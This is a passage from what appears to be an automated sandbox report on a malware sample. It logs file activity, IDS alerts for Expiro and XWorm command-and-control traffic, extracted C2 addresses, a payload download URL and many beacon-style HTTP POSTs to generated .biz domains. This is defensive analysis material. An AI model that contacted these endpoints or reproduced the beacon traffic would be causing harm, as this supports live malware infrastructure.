                Source: C:\Users\Public\alpha.pifCode function: 17_2_00020207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,17_2_00020207
                Source: C:\Users\Public\alpha.pifCode function: 17_2_00033E66 FindFirstFileW,FindNextFileW,FindClose,17_2_00033E66
                Source: C:\Users\Public\alpha.pifCode function: 17_2_00024EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,17_2_00024EC1
                Source: C:\Users\Public\alpha.pifCode function: 17_2_0001532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,17_2_0001532E
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.8:49708 -> 54.244.188.177:80
                Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.8:65093 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.8:51366 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.8:61527 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.8:60770 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 62.60.190.120:7923 -> 192.168.2.8:49727
                Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 62.60.190.120:7923 -> 192.168.2.8:49727
                Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49727 -> 62.60.190.120:7923
                Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.8:49800 -> 18.246.231.120:80
                Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.8:49727 -> 62.60.190.120:7923
                Source: Network trafficSuricata IDS: 2051654 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (cikivjto .biz) : 192.168.2.8:50711 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2051651 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (eufxebus .biz) : 192.168.2.8:58390 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2051651 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (eufxebus .biz) : 192.168.2.8:57993 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2051653 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz) : 192.168.2.8:61989 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.8:50171 -> 18.141.10.107:80
                Source: Network trafficSuricata IDS: 2051653 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz) : 192.168.2.8:55730 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2051654 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (cikivjto .biz) : 192.168.2.8:62117 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2051652 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (napws .biz) : 192.168.2.8:50355 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.8:60253 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2051650 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz) : 192.168.2.8:57471 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.8:60791 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.8:49846 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.8:56268 -> 82.112.184.197:80
                Source: Network trafficSuricata IDS: 2051650 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz) : 192.168.2.8:57634 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49727 -> 62.60.190.120:7923
                Source: Network trafficSuricata IDS: 2051652 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (napws .biz) : 192.168.2.8:60684 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.8:53706 -> 1.1.1.1:53
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: 62.60.190.120
                Source: Malware configuration extractorURLs: https://chichometextiles.com/wp-admin/233_Jwsmvmdweya
                Queries random domain names (often used to prevent blacklisting and sinkholes)
                Source: unknownDNS traffic detected: English language letter frequency does not match the domain names
                Source: unknownNetwork traffic detected: DNS query count 129
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B0E4B8 InternetCheckConnectionA,4_2_02B0E4B8
                Source: global trafficTCP traffic: 192.168.2.8:49727 -> 62.60.190.120:7923
                Source: global trafficDNS traffic detected: number of DNS queries: 129
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.8:49711
                Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.8:49708
                Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.8:49708
                Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.8:49731
                Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.8:49731
                Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.8:49711
                Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.211.97.45:80 -> 192.168.2.8:49790
                Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.211.97.45:80 -> 192.168.2.8:49790
                Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.8:49749
                Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.8:49752
                Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.208.156.248:80 -> 192.168.2.8:49771
                Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.208.156.248:80 -> 192.168.2.8:49771
                Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.254.94.185:80 -> 192.168.2.8:49802
                Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.254.94.185:80 -> 192.168.2.8:49802
                Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.246.231.120:80 -> 192.168.2.8:49779
                Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.246.231.120:80 -> 192.168.2.8:49779
                Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.246.200.160:80 -> 192.168.2.8:49745
                Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.246.200.160:80 -> 192.168.2.8:49745
                Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.8:49785
                Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.8:49785
                Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.8:49752
                Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.8:49749
                Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 35.164.78.200:80 -> 192.168.2.8:49753
                Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 35.164.78.200:80 -> 192.168.2.8:49753
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.8:49716
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.8:49776
                Source: global trafficHTTP traffic detected: GET /wp-admin/233_Jwsmvmdweya HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: chichometextiles.com
                Source: global trafficHTTP traffic detected: POST /xvpanbchxym HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /ks HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /iwwaryskplxdjo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /ludmpidgkyjmk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /i HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /pywymqfnuombtvtm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /luqhjxxa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /fnl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /ln HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /uqcynitxoaix HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /rlj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /rwebgnmbtiq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /hmsaqgigfaxqle HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /gcpevfxhbnb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /tpnpycqre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /idnuv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /ifmujtvaxdtknray HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /f HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /qrcvkhcipj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /lurykvmwmoqvfvd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /p HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /ou HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /rnsuojk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /shc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /vhkhfdko HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /xnnwo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /iobhvfdyhggtu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /mbh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /sjajebqyfvuqndq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /dujlogesynfu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /qautyxiqxdcgavi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /vdvikkmvoibst HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /go HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /bvawourmbxmjmarr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /uquynocac HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /igs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /okedkgjfoq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
